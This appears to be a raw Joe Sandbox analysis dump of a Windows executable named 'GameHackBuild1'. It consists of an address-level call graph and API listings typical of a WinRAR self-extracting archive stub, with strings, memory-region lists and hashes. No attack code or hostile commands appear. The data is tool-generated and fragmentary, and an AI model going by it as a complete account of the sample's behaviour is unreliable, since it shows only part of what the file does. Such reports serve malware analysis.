84 API calls 23554->23555 23555->23553 23556->23315 24182 a1ac74 PeekMessageW 23557->24182 23560 a1cb88 23564 a1cb93 ShowWindow SendMessageW SendMessageW 23560->23564 23561 
a1cbbc SendMessageW SendMessageW 23562 a1cc17 SendMessageW SendMessageW SendMessageW 23561->23562 23563 a1cbf8 23561->23563 23565 a1cc4a SendMessageW 23562->23565 23566 a1cc6d SendMessageW 23562->23566 23563->23562 23564->23561 23565->23566 23566->23335 23567->23392 23568->23416 23569->23421 23570->23425 23571->23431 23572->23439 23573->23370 23574->23389 23575->23366 23576->23356 23577->23447 23578->23444 23580 a0a214 23579->23580 23581 a0a238 23580->23581 23583 a0a22b CreateDirectoryW 23580->23583 23582 a0a180 4 API calls 23581->23582 23585 a0a23e 23582->23585 23583->23581 23584 a0a26b 23583->23584 23589 a0a27a 23584->23589 23592 a0a444 23584->23592 23586 a0a27e GetLastError 23585->23586 23587 a0b66c 2 API calls 23585->23587 23586->23589 23590 a0a254 23587->23590 23589->23454 23590->23586 23591 a0a258 CreateDirectoryW 23590->23591 23591->23584 23591->23586 23593 a1e360 23592->23593 23594 a0a451 SetFileAttributesW 23593->23594 23595 a0a494 23594->23595 23596 a0a467 23594->23596 23595->23589 23597 a0b66c 2 API calls 23596->23597 23598 a0a47b 23597->23598 23598->23595 23599 a0a47f SetFileAttributesW 23598->23599 23599->23595 23601 a09820 23600->23601 23602 a09824 23600->23602 23601->23468 23602->23601 23611 a0a12d 23602->23611 23606 a096dc 23605->23606 23607 a096fa 23605->23607 23606->23607 23609 a096e8 CloseHandle 23606->23609 23608 a09719 23607->23608 23619 a06e3e 74 API calls 23607->23619 23608->23468 23609->23607 23612 a1e360 23611->23612 23613 a0a13a DeleteFileW 23612->23613 23614 a0984c 23613->23614 23615 a0a14d 23613->23615 23614->23468 23616 a0b66c 2 API calls 23615->23616 23617 a0a161 23616->23617 23617->23614 23618 a0a165 DeleteFileW 23617->23618 23618->23614 23619->23608 23626 a0d28a 23620->23626 23623 a0de22 LoadStringW 23624 a0ddfc SetDlgItemTextW 23623->23624 23625 a0de39 LoadStringW 23623->23625 23624->23478 23625->23624 23631 a0d1c3 23626->23631 23628 a0d2a7 23629 a0d2bc 23628->23629 23639 a0d2c8 26 API calls 23628->23639 23629->23623 23629->23624 
23632 a0d1de 23631->23632 23638 a0d1d7 _strncpy 23631->23638 23634 a0d202 23632->23634 23640 a11596 WideCharToMultiByte 23632->23640 23637 a0d233 23634->23637 23641 a0dd6b 50 API calls __vsnprintf 23634->23641 23642 a258d9 26 API calls 3 library calls 23637->23642 23638->23628 23639->23629 23640->23634 23641->23637 23642->23638 23643->23493 23644->23493 23645->23503 23646->23493 23647->23493 23648->23493 23650 a0feba 23649->23650 23678 a01789 23650->23678 23652 a0fed2 23652->23507 23654 a0fead 23653->23654 23655 a01789 76 API calls 23654->23655 23656 a0fed2 23655->23656 23656->23509 23658 a07c72 __EH_prolog 23657->23658 23695 a0c827 23658->23695 23660 a07c8d 23701 a1e24a 23660->23701 23662 a07cb7 23707 a1440b 23662->23707 23665 a07ddf 23666 a07de9 23665->23666 23671 a07e53 23666->23671 23739 a0a4c6 23666->23739 23668 a07f06 23668->23513 23669 a07ec4 23669->23668 23745 a06dc1 74 API calls 23669->23745 23671->23669 23673 a0a4c6 8 API calls 23671->23673 23717 a0837f 23671->23717 23673->23671 23675 a07d09 23674->23675 23677 a07d10 23674->23677 23676 a11acf 84 API calls 23675->23676 23676->23677 23679 a0179f 23678->23679 23690 a017fa __vsnwprintf_l 23678->23690 23680 a017c8 23679->23680 23691 a06e91 74 API calls __vswprintf_c_l 23679->23691 23681 a01827 23680->23681 23684 a017e7 ___std_exception_copy 23680->23684 23683 a235de 22 API calls 23681->23683 23686 a0182e 23683->23686 23684->23690 23693 a06efd 75 API calls 23684->23693 23685 a017be 23692 a06efd 75 API calls 23685->23692 23686->23690 23694 a06efd 75 API calls 23686->23694 23690->23652 23691->23685 23692->23680 23693->23690 23694->23690 23696 a0c831 __EH_prolog 23695->23696 23697 a1e24a new 8 API calls 23696->23697 23698 a0c874 23697->23698 23699 a1e24a new 8 API calls 23698->23699 23700 a0c898 23699->23700 23700->23660 23706 a1e24f ___std_exception_copy 23701->23706 23702 a1e27b 23702->23662 23706->23702 23713 a271ad 7 API calls 2 library calls 23706->23713 23714 a1ecce RaiseException 
Concurrency::cancel_current_task new 23706->23714 23715 a1ecb1 RaiseException Concurrency::cancel_current_task 23706->23715 23708 a14415 __EH_prolog 23707->23708 23709 a1e24a new 8 API calls 23708->23709 23710 a14431 23709->23710 23711 a07ce6 23710->23711 23716 a106ba 78 API calls 23710->23716 23711->23665 23713->23706 23716->23711 23718 a08389 __EH_prolog 23717->23718 23746 a01380 23718->23746 23720 a083a4 23754 a09ef7 23720->23754 23726 a083d3 23877 a01631 23726->23877 23727 a0846e 23773 a08517 23727->23773 23731 a084ce 23780 a01f00 23731->23780 23734 a083cf 23734->23726 23734->23727 23737 a0a4c6 8 API calls 23734->23737 23881 a0bac4 CompareStringW 23734->23881 23735 a084d9 23735->23726 23784 a03aac 23735->23784 23794 a0857b 23735->23794 23737->23734 23740 a0a4db 23739->23740 23741 a0a4df 23740->23741 24150 a0a5f4 23740->24150 23741->23666 23743 a0a4ef 23743->23741 23744 a0a4f4 FindClose 23743->23744 23744->23741 23745->23668 23747 a01385 __EH_prolog 23746->23747 23748 a0c827 8 API calls 23747->23748 23749 a013bd 23748->23749 23750 a1e24a new 8 API calls 23749->23750 23753 a01416 ___scrt_fastfail 23749->23753 23751 a01403 23750->23751 23751->23753 23882 a0b07d 23751->23882 23753->23720 23755 a09f0e 23754->23755 23756 a083ba 23755->23756 23898 a06f5d 76 API calls 23755->23898 23756->23726 23758 a019a6 23756->23758 23759 a019b0 __EH_prolog 23758->23759 23769 a01a00 23759->23769 23772 a019e5 23759->23772 23899 a0709d 23759->23899 23761 a01b50 23902 a06dc1 74 API calls 23761->23902 23763 a03aac 97 API calls 23767 a01bb3 23763->23767 23764 a01b60 23764->23763 23764->23772 23765 a01bff 23771 a01c32 23765->23771 23765->23772 23903 a06dc1 74 API calls 23765->23903 23767->23765 23768 a03aac 97 API calls 23767->23768 23768->23767 23769->23761 23769->23764 23769->23772 23770 a03aac 97 API calls 23770->23771 23771->23770 23771->23772 23772->23734 23774 a08524 23773->23774 23921 a10c26 GetSystemTime SystemTimeToFileTime 23774->23921 23776 a08488 23776->23731 23777 a11359 
23776->23777 23923 a1d51a 23777->23923 23781 a01f05 __EH_prolog 23780->23781 23783 a01f39 23781->23783 23931 a01951 23781->23931 23783->23735 23785 a03ab8 23784->23785 23786 a03abc 23784->23786 23785->23735 23787 a03af7 23786->23787 23788 a03ae9 23786->23788 24089 a027e8 97 API calls 3 library calls 23787->24089 23789 a03b29 23788->23789 24088 a03281 85 API calls 3 library calls 23788->24088 23789->23735 23792 a03af5 23792->23789 24090 a0204e 74 API calls 23792->24090 23795 a08585 __EH_prolog 23794->23795 23796 a085be 23795->23796 23812 a085c2 23795->23812 24113 a184bd 99 API calls 23795->24113 23797 a085e7 23796->23797 23802 a0867a 23796->23802 23796->23812 23799 a08609 23797->23799 23797->23812 24114 a07b66 151 API calls 23797->24114 23799->23812 24115 a184bd 99 API calls 23799->24115 23802->23812 24091 a05e3a 23802->24091 23804 a08705 23804->23812 24097 a0826a 23804->24097 23807 a08875 23808 a0a4c6 8 API calls 23807->23808 23810 a088e0 23807->23810 23808->23810 23809 a0c991 80 API calls 23820 a0893b _memcmp 23809->23820 24101 a07d6c 23810->24101 23812->23735 23813 a08a70 23814 a08b43 23813->23814 23821 a08abf 23813->23821 23818 a08b9e 23814->23818 23831 a08b4e 23814->23831 23815 a08a69 24118 a01f94 74 API calls 23815->24118 23828 a08b30 23818->23828 24121 a080ea 96 API calls 23818->24121 23819 a08b9c 23824 a09653 79 API calls 23819->23824 23820->23809 23820->23812 23820->23813 23820->23815 24116 a08236 82 API calls 23820->24116 24117 a01f94 74 API calls 23820->24117 23825 a0a180 4 API calls 23821->23825 23821->23828 23823 a09653 79 API calls 23823->23812 23824->23812 23826 a08af7 23825->23826 23826->23828 24119 a09377 96 API calls 23826->24119 23827 a08c09 23840 a08c74 23827->23840 23875 a091c1 __except_handler4 23827->23875 24122 a09989 23827->24122 23828->23819 23828->23827 23829 a0aa88 8 API calls 23832 a08cc3 23829->23832 23831->23819 24120 a07f26 100 API calls __except_handler4 23831->24120 23836 a0aa88 8 API calls 23832->23836 23834 a08c4c 23834->23840 
24126 a01f94 74 API calls 23834->24126 23853 a08cd9 23836->23853 23838 a08c62 24127 a07061 75 API calls 23838->24127 23840->23829 23841 a08df7 23844 a08e69 23841->23844 23845 a08e07 23841->23845 23842 a08efd 23847 a08f23 23842->23847 23848 a08f0f 23842->23848 23864 a08e27 23842->23864 23843 a08d9c 23843->23841 23843->23842 23846 a0826a CharUpperW 23844->23846 23849 a08e4d 23845->23849 23857 a08e15 23845->23857 23850 a08e84 23846->23850 23852 a12c42 75 API calls 23847->23852 23851 a092e6 121 API calls 23848->23851 23849->23864 24130 a07907 108 API calls 23849->24130 23860 a08eb4 23850->23860 23861 a08ead 23850->23861 23850->23864 23851->23864 23855 a08f3c 23852->23855 23853->23843 24128 a09b21 SetFilePointer GetLastError SetEndOfFile 23853->24128 23858 a128f1 121 API calls 23855->23858 24129 a01f94 74 API calls 23857->24129 23858->23864 24132 a09224 94 API calls __EH_prolog 23860->24132 24131 a07698 84 API calls __except_handler4 23861->24131 23866 a0904b 23864->23866 24133 a01f94 74 API calls 23864->24133 23868 a09104 23866->23868 23866->23875 23876 a09156 23866->23876 24107 a09ebf SetEndOfFile 23866->24107 23867 a0a444 4 API calls 23871 a091b1 23867->23871 24108 a09d62 23868->24108 23871->23875 24134 a01f94 74 API calls 23871->24134 23872 a0914b 23874 a096d0 75 API calls 23872->23874 23874->23876 23875->23823 23876->23867 23876->23875 23878 a01643 23877->23878 24149 a0c8ca 84 API calls 23878->24149 23881->23734 23883 a0b087 __EH_prolog 23882->23883 23888 a0ea80 80 API calls 23883->23888 23885 a0b099 23889 a0b195 23885->23889 23888->23885 23890 a0b1a7 ___scrt_fastfail 23889->23890 23893 a10948 23890->23893 23896 a10908 GetCurrentProcess GetProcessAffinityMask 23893->23896 23897 a0b10f 23896->23897 23897->23753 23898->23756 23904 a016d2 23899->23904 23901 a070b9 23901->23769 23902->23772 23903->23771 23905 a016e8 23904->23905 23916 a01740 __vsnwprintf_l 23904->23916 23906 a01711 23905->23906 23917 a06e91 74 API calls __vswprintf_c_l 23905->23917 23907 a01767 
23906->23907 23913 a0172d ___std_exception_copy 23906->23913 23909 a235de 22 API calls 23907->23909 23911 a0176e 23909->23911 23910 a01707 23918 a06efd 75 API calls 23910->23918 23911->23916 23920 a06efd 75 API calls 23911->23920 23913->23916 23919 a06efd 75 API calls 23913->23919 23916->23901 23917->23910 23918->23906 23919->23916 23920->23916 23922 a10c56 __vswprintf_c_l 23921->23922 23922->23776 23924 a1d527 23923->23924 23925 a0ddd1 53 API calls 23924->23925 23926 a1d54a 23925->23926 23927 a0400a _swprintf 51 API calls 23926->23927 23928 a1d55c 23927->23928 23929 a1cb5a 16 API calls 23928->23929 23930 a11372 23929->23930 23930->23731 23932 a01961 23931->23932 23934 a0195d 23931->23934 23935 a01896 23932->23935 23934->23783 23936 a018a8 23935->23936 23937 a018e5 23935->23937 23938 a03aac 97 API calls 23936->23938 23943 a03f18 23937->23943 23939 a018c8 23938->23939 23939->23934 23947 a03f21 23943->23947 23944 a03aac 97 API calls 23944->23947 23945 a01906 23945->23939 23948 a01e00 23945->23948 23947->23944 23947->23945 23960 a1067c 23947->23960 23949 a01e0a __EH_prolog 23948->23949 23968 a03b3d 23949->23968 23951 a01e34 23952 a01ebb 23951->23952 23953 a016d2 76 API calls 23951->23953 23952->23939 23954 a01e4b 23953->23954 23996 a01849 76 API calls 23954->23996 23956 a01e63 23958 a01e6f 23956->23958 23997 a1137a MultiByteToWideChar 23956->23997 23998 a01849 76 API calls 23958->23998 23961 a10683 23960->23961 23962 a1069e 23961->23962 23966 a06e8c RaiseException Concurrency::cancel_current_task 23961->23966 23964 a106af SetThreadExecutionState 23962->23964 23967 a06e8c RaiseException Concurrency::cancel_current_task 23962->23967 23964->23947 23966->23962 23967->23964 23969 a03b47 __EH_prolog 23968->23969 23970 a03b79 23969->23970 23971 a03b5d 23969->23971 23972 a03dc2 23970->23972 23976 a03ba5 23970->23976 24027 a06dc1 74 API calls 23971->24027 24052 a06dc1 74 API calls 23972->24052 23975 a03b68 23975->23951 23976->23975 23999 a12c42 23976->23999 23978 a03c26 23979 
a03cb1 23978->23979 23995 a03c1d 23978->23995 24030 a0c991 23978->24030 24012 a0aa88 23979->24012 23980 a03c22 23980->23978 24029 a02034 76 API calls 23980->24029 23982 a03c12 24028 a06dc1 74 API calls 23982->24028 23983 a03bf4 23983->23978 23983->23980 23983->23982 23988 a03cc4 23989 a03d48 23988->23989 23990 a03d3e 23988->23990 24036 a128f1 23989->24036 24016 a092e6 23990->24016 23993 a03d46 23993->23995 24045 a01f94 74 API calls 23993->24045 24046 a11acf 23995->24046 23996->23956 23997->23958 23998->23952 24000 a12c51 23999->24000 24002 a12c5b 23999->24002 24053 a06efd 75 API calls 24000->24053 24004 a12ca2 ___std_exception_copy 24002->24004 24006 a12c9d Concurrency::cancel_current_task 24002->24006 24010 a12cfd ___scrt_fastfail 24002->24010 24003 a12da9 Concurrency::cancel_current_task 24056 a2157a RaiseException 24003->24056 24004->24003 24005 a12cd9 24004->24005 24004->24010 24054 a12b7b 75 API calls 3 library calls 24005->24054 24055 a2157a RaiseException 24006->24055 24010->23983 24011 a12dc1 24013 a0aa95 24012->24013 24015 a0aa9f 24012->24015 24014 a1e24a new 8 API calls 24013->24014 24014->24015 24015->23988 24017 a092f0 __EH_prolog 24016->24017 24057 a07dc6 24017->24057 24020 a0709d 76 API calls 24021 a09302 24020->24021 24060 a0ca6c 24021->24060 24023 a09314 24024 a0935c 24023->24024 24026 a0ca6c 114 API calls 24023->24026 24069 a0cc51 97 API calls __vsnwprintf_l 24023->24069 24024->23993 24026->24023 24027->23975 24028->23995 24029->23978 24031 a0c9b2 24030->24031 24032 a0c9c4 24030->24032 24070 a06249 80 API calls 24031->24070 24071 a06249 80 API calls 24032->24071 24035 a0c9bc 24035->23979 24037 a128fa 24036->24037 24039 a12923 24036->24039 24038 a12917 24037->24038 24041 a12919 24037->24041 24042 a1290f 24037->24042 24038->23993 24039->24038 24086 a14edf 121 API calls 2 library calls 24039->24086 24085 a15bf7 114 API calls 24041->24085 24072 a16646 24042->24072 24045->23995 24047 a11ad9 24046->24047 24048 a11af2 24047->24048 24051 a11b06 
24047->24051 24087 a1075b 84 API calls 24048->24087 24050 a11af9 24050->24051 24052->23975 24053->24002 24054->24010 24055->24003 24056->24011 24058 a0acf5 GetVersionExW 24057->24058 24059 a07dcb 24058->24059 24059->24020 24065 a0ca82 __vsnwprintf_l 24060->24065 24061 a0cbf7 24062 a0cc1f 24061->24062 24063 a0ca0b 6 API calls 24061->24063 24064 a1067c SetThreadExecutionState RaiseException 24062->24064 24063->24062 24067 a0cbee 24064->24067 24065->24061 24066 a184bd 99 API calls 24065->24066 24065->24067 24068 a0ab70 89 API calls 24065->24068 24066->24065 24067->24023 24068->24065 24069->24023 24070->24035 24071->24035 24073 a12e6d 75 API calls 24072->24073 24080 a16657 ___BuildCatchObject __vsnwprintf_l 24073->24080 24074 a0ca6c 114 API calls 24074->24080 24075 a16a29 24076 a14bb3 98 API calls 24075->24076 24077 a16a39 __vsnwprintf_l 24076->24077 24077->24038 24078 a10a41 79 API calls 24078->24080 24079 a137c1 114 API calls 24079->24080 24080->24074 24080->24075 24080->24078 24080->24079 24081 a107f1 86 API calls 24080->24081 24082 a16a7b 114 API calls 24080->24082 24083 a170bf 121 API calls 24080->24083 24084 a1321a 98 API calls 24080->24084 24081->24080 24082->24080 24083->24080 24084->24080 24085->24038 24086->24038 24087->24050 24088->23792 24089->23792 24090->23789 24092 a05e4a 24091->24092 24135 a05d67 24092->24135 24094 a05eb5 24094->23804 24095 a05e7d 24095->24094 24140 a0ad65 CharUpperW CompareStringW 24095->24140 24098 a08289 24097->24098 24146 a1179d CharUpperW 24098->24146 24100 a08333 24100->23807 24102 a07d7b 24101->24102 24103 a07dbb 24102->24103 24147 a07043 74 API calls 24102->24147 24103->23820 24105 a07db3 24148 a06dc1 74 API calls 24105->24148 24107->23868 24109 a09d73 24108->24109 24111 a09d82 24108->24111 24110 a09d79 FlushFileBuffers 24109->24110 24109->24111 24110->24111 24112 a09dfb SetFileTime 24111->24112 24112->23872 24113->23796 24114->23799 24115->23812 24116->23820 24117->23820 24118->23813 24119->23828 24120->23819 24121->23828 24123 
a09992 GetFileType 24122->24123 24124 a0998f 24122->24124 24125 a099a0 24123->24125 24124->23834 24125->23834 24126->23838 24127->23840 24128->23843 24129->23864 24130->23864 24131->23864 24132->23864 24133->23866 24134->23875 24141 a05c64 24135->24141 24138 a05d88 24138->24095 24139 a05c64 2 API calls 24139->24138 24140->24095 24142 a05c6e 24141->24142 24144 a05d56 24142->24144 24145 a0ad65 CharUpperW CompareStringW 24142->24145 24144->24138 24144->24139 24145->24142 24146->24100 24147->24105 24148->24103 24151 a0a5fe 24150->24151 24152 a0a691 FindNextFileW 24151->24152 24153 a0a621 FindFirstFileW 24151->24153 24154 a0a6b0 24152->24154 24155 a0a69c GetLastError 24152->24155 24156 a0a638 24153->24156 24161 a0a675 24153->24161 24154->24161 24155->24154 24157 a0b66c 2 API calls 24156->24157 24158 a0a64d 24157->24158 24159 a0a651 FindFirstFileW 24158->24159 24160 a0a66a GetLastError 24158->24160 24159->24160 24159->24161 24160->24161 24161->23743 24171 a19d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24162->24171 24164 a19d21 24165 a19d2d 24164->24165 24172 a19d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24164->24172 24165->23520 24165->23521 24167->23524 24168->23530 24169->23530 24170->23533 24171->24164 24172->24165 24173->23541 24175 a09ef7 76 API calls 24174->24175 24176 a01f5b 24175->24176 24177 a01f78 24176->24177 24178 a019a6 97 API calls 24176->24178 24177->23549 24177->23550 24179 a01f68 24178->24179 24179->24177 24181 a06dc1 74 API calls 24179->24181 24181->24177 24183 a1acc8 GetDlgItem 24182->24183 24184 a1ac8f GetMessageW 24182->24184 24183->23560 24183->23561 24185 a1aca5 IsDialogMessageW 24184->24185 24186 a1acb4 TranslateMessage DispatchMessageW 24184->24186 24185->24183 24185->24186 24186->24183 24836 a1b8e0 93 API calls _swprintf 24837 a18ce0 6 API calls 24840 a316e0 CloseHandle 24886 a1ebf7 20 API calls 24204 a1e1f9 24205 a1e203 24204->24205 24206 a1df59 ___delayLoadHelper2@8 19 API calls 24205->24206 24207 a1e210 24206->24207 24843 a214f8 
RaiseException 24845 a1eac0 27 API calls pre_c_initialization 24887 a197c0 10 API calls 24847 a29ec0 21 API calls 24888 a2b5c0 GetCommandLineA GetCommandLineW 24848 a1a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24889 a2ebc1 21 API calls __vswprintf_c_l 24849 a1acd0 100 API calls 24893 a119d0 26 API calls std::bad_exception::bad_exception 24222 a1ead2 24223 a1eade ___DestructExceptionObject 24222->24223 24248 a1e5c7 24223->24248 24225 a1eae5 24227 a1eb0e 24225->24227 24328 a1ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24225->24328 24235 a1eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24227->24235 24259 a2824d 24227->24259 24231 a1eb2d ___DestructExceptionObject 24232 a1ebad 24267 a1f020 24232->24267 24235->24232 24329 a27243 38 API calls 3 library calls 24235->24329 24243 a1ebd9 24245 a1ebe2 24243->24245 24330 a2764a 28 API calls _abort 24243->24330 24331 a1e73e 13 API calls 2 library calls 24245->24331 24249 a1e5d0 24248->24249 24332 a1ed5b IsProcessorFeaturePresent 24249->24332 24251 a1e5dc 24333 a22016 24251->24333 24253 a1e5e1 24258 a1e5e5 24253->24258 24342 a280d7 24253->24342 24256 a1e5fc 24256->24225 24258->24225 24260 a28264 24259->24260 24261 a1ec4a ___delayLoadHelper2@8 5 API calls 24260->24261 24262 a1eb27 24261->24262 24262->24231 24263 a281f1 24262->24263 24264 a28220 24263->24264 24265 a1ec4a ___delayLoadHelper2@8 5 API calls 24264->24265 24266 a28249 24265->24266 24266->24235 24392 a1f350 24267->24392 24269 a1f033 GetStartupInfoW 24270 a1ebb3 24269->24270 24271 a2819e 24270->24271 24394 a2b290 24271->24394 24273 a1ebbc 24276 a1d5d4 24273->24276 24275 a281a7 24275->24273 24398 a2b59a 38 API calls 24275->24398 24519 a100cf 24276->24519 24280 a1d5f3 24568 a1a335 24280->24568 24282 a1d5fc 24572 a113b3 GetCPInfo 24282->24572 24284 a1d606 ___scrt_fastfail 24285 a1d619 GetCommandLineW 24284->24285 24286 a1d6a6 GetModuleFileNameW 
SetEnvironmentVariableW GetLocalTime 24285->24286 24287 a1d628 24285->24287 24288 a0400a _swprintf 51 API calls 24286->24288 24605 a1bc84 81 API calls 24287->24605 24290 a1d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24288->24290 24575 a1aded LoadBitmapW 24290->24575 24291 a1d62e 24293 a1d6a0 24291->24293 24294 a1d636 OpenFileMappingW 24291->24294 24607 a1d287 SetEnvironmentVariableW SetEnvironmentVariableW 24293->24607 24296 a1d696 CloseHandle 24294->24296 24297 a1d64f MapViewOfFile 24294->24297 24296->24286 24300 a1d660 __vsnwprintf_l 24297->24300 24301 a1d68d UnmapViewOfFile 24297->24301 24606 a1d287 SetEnvironmentVariableW SetEnvironmentVariableW 24300->24606 24301->24296 24306 a18835 8 API calls 24308 a1d76a DialogBoxParamW 24306->24308 24307 a1d67c 24307->24301 24309 a1d7a4 24308->24309 24310 a1d7b6 Sleep 24309->24310 24311 a1d7bd 24309->24311 24310->24311 24314 a1d7cb 24311->24314 24608 a1a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24311->24608 24313 a1d7ea DeleteObject 24315 a1d806 24313->24315 24316 a1d7ff DeleteObject 24313->24316 24314->24313 24317 a1d837 24315->24317 24318 a1d849 24315->24318 24316->24315 24609 a1d2e6 6 API calls 24317->24609 24602 a1a39d 24318->24602 24320 a1d83d CloseHandle 24320->24318 24322 a1d883 24323 a2757e GetModuleHandleW 24322->24323 24324 a1ebcf 24323->24324 24324->24243 24325 a276a7 24324->24325 24744 a27424 24325->24744 24328->24225 24329->24232 24330->24245 24331->24231 24332->24251 24334 a2201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24333->24334 24346 a2310e 24334->24346 24338 a22031 24339 a2203c 24338->24339 24360 a2314a DeleteCriticalSection 24338->24360 24339->24253 24341 a22029 24341->24253 24388 a2b73a 24342->24388 24345 a2203f 8 API calls 3 library calls 24345->24258 24348 a23117 24346->24348 24349 a23140 24348->24349 24350 a22025 24348->24350 24361 a23385 24348->24361 24366 a2314a DeleteCriticalSection 24349->24366 24350->24341 24352 a2215c 

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00A100CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00A100E4
                                        • Part of subcall function 00A100CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A100F6
                                        • Part of subcall function 00A100CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A10127
                                        • Part of subcall function 00A19DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00A19DAC
                                        • Part of subcall function 00A1A335: OleInitialize.OLE32(00000000), ref: 00A1A34E
                                        • Part of subcall function 00A1A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A1A385
                                        • Part of subcall function 00A1A335: SHGetMalloc.SHELL32(00A48430), ref: 00A1A38F
                                        • Part of subcall function 00A113B3: GetCPInfo.KERNEL32(00000000,?), ref: 00A113C4
                                        • Part of subcall function 00A113B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00A113D8
                                      • GetCommandLineW.KERNEL32 ref: 00A1D61C
                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00A1D643
                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00A1D654
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00A1D68E
                                        • Part of subcall function 00A1D287: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00A1D29D
                                        • Part of subcall function 00A1D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A1D2D9
                                      • CloseHandle.KERNEL32(00000000), ref: 00A1D697
                                      • GetModuleFileNameW.KERNEL32(00000000,00A5DC90,00000800), ref: 00A1D6B2
                                      • SetEnvironmentVariableW.KERNEL32(sfxname,00A5DC90), ref: 00A1D6BE
                                      • GetLocalTime.KERNEL32(?), ref: 00A1D6C9
                                      • _swprintf.LIBCMT ref: 00A1D708
                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00A1D71A
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00A1D721
                                      • LoadIconW.USER32(00000000,00000064), ref: 00A1D738
                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00A1D789
                                      • Sleep.KERNEL32(?), ref: 00A1D7B7
                                      • DeleteObject.GDI32 ref: 00A1D7F0
                                      • DeleteObject.GDI32(?), ref: 00A1D800
                                      • CloseHandle.KERNEL32 ref: 00A1D843
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                      • API String ID: 788466649-433059772
                                      • Opcode ID: 4bd848df95d71dd0945334ce7d926340775a2ec6669b0d0e9f4b93c0432d0867
                                      • Instruction ID: 4ba263efe6f8db33d8edb012ac854e794731c7d55ddc6f95e8a50e354172b0c4
                                      • Opcode Fuzzy Hash: 4bd848df95d71dd0945334ce7d926340775a2ec6669b0d0e9f4b93c0432d0867
                                      • Instruction Fuzzy Hash: 8B61F179904340AFD720EFE4ED49FAB37A8BB85741F000429F94592191DBB9CD86C7A2

                                      Control-flow Graph

                                      APIs
                                      • FindResourceW.KERNEL32(00A1AE4D,PNG,?,?,?,00A1AE4D,00000066), ref: 00A19E2E
                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00A1AE4D,00000066), ref: 00A19E46
                                      • LoadResource.KERNEL32(00000000,?,?,?,00A1AE4D,00000066), ref: 00A19E59
                                      • LockResource.KERNEL32(00000000,?,?,?,00A1AE4D,00000066), ref: 00A19E64
                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A1AE4D,00000066), ref: 00A19E82
                                      • GlobalLock.KERNEL32(00000000), ref: 00A19E93
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00A19EB7
                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A19EFC
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A19F1B
                                      • GlobalFree.KERNEL32(00000000), ref: 00A19F22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                      • String ID: PNG
                                      • API String ID: 3656887471-364855578
                                      • Opcode ID: 7498fb9e7530962b23755534e66d1bb8d839221fd8ac3d38f68144dfe3b5e878
